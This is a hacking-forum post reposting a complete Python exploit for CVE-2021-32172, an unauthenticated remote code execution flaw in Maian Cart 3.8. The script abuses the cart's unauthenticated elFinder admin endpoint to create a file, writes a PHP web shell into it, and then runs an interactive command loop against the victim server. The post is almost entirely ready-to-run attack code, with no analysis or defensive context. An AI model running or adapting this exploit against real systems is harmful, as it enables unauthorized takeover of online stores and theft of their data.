Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)

 Share


Recommended Posts

# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Software Link: https://www.maiancart.com/download.html
# Vendor homepage: https://www.maianscriptworld.co.uk/
# Version: Maian Cart 3.8
# CVE: CVE-2021-32172

#!/usr/bin/python3

import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the
maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()

#args

host = sys.argv[1]
directory = sys.argv[2]

#CREATE THE FILE

print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True)
time.sleep(1)

try:
    r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw")
    print(r.text)
    if "added" in r.text:
        print("\033[95mFile successfully created.\n\033[00m")
    else:
        print("\033[91mSome error occured.\033[00m")

except (requests.exceptions.RequestException):
    print("\033[91mThere was a connection issue. Check if you're
connected to wifi or if the host is correct\033[00m")

#GET THE FILE ID

time.sleep(1)

file_response = r.text
soup = BeautifulSoup(file_response,'html.parser')
site_json=json.loads(soup.text)
hash_id = [h.get('hash') for h in site_json['added']]
file_id =  str(hash_id).replace("['", "").replace("']", "")


print("\033[95mGot the file id: ", "\033[91m", file_id , "\033[00m")
print("\n")

#WRITE TO THE FILE

print("\033[95mWritting the payload to the file...\033[00m")
print("\n")
time.sleep(1)

headers = {
    "Accept": "application/json, text/javascript, /; q=0.01",
    "Accept-Language" : "en-US,en;q=0.5",
    "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With" : "XMLHttpRequest",
    "Connection" : "keep-alive",
    "Pragma" : "no-cache",
    "Cache-Control" : "no-cache",
}

data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E"

try:
    write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder",
headers=headers, data=data)
    print(write.text)
except (requests.exceptions.RequestException):
    print("\033[91mThere was a connection issue. Check if you're
connected to wifi or if the host is correct\033[00m")


#EXECUTE THE PAYLOAD

print("\033[95mExecuting the payload...\033[00m")
print("\n")
time.sleep(1)

exec_host = f"{host}{directory}/product-downloads/shell.php"

print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser
url: {host}{directory}/product-downloads/shell.php?cmd=\033[00m")
time.sleep(2)

while True:
    def main():
        execute = str(input("$ "))
        e = requests.get(f"{exec_host}?cmd={execute}")
        print(e.text)

    try:
        if __name__ == "__main__":
            main()
    except:
        exit = str(input("Do you really wish to exit? Y/N? "))

        if exit == "Y" or exit =="y":
            print("\033[91mExit detected. Removing the shell...\033[00m")
            remove =
requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}")
            print("\033[91m" , remove.text, "\033[00m")
            print("\033[91mBye!\033[00m")
            sys.exit(1)
        else:
            main()
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...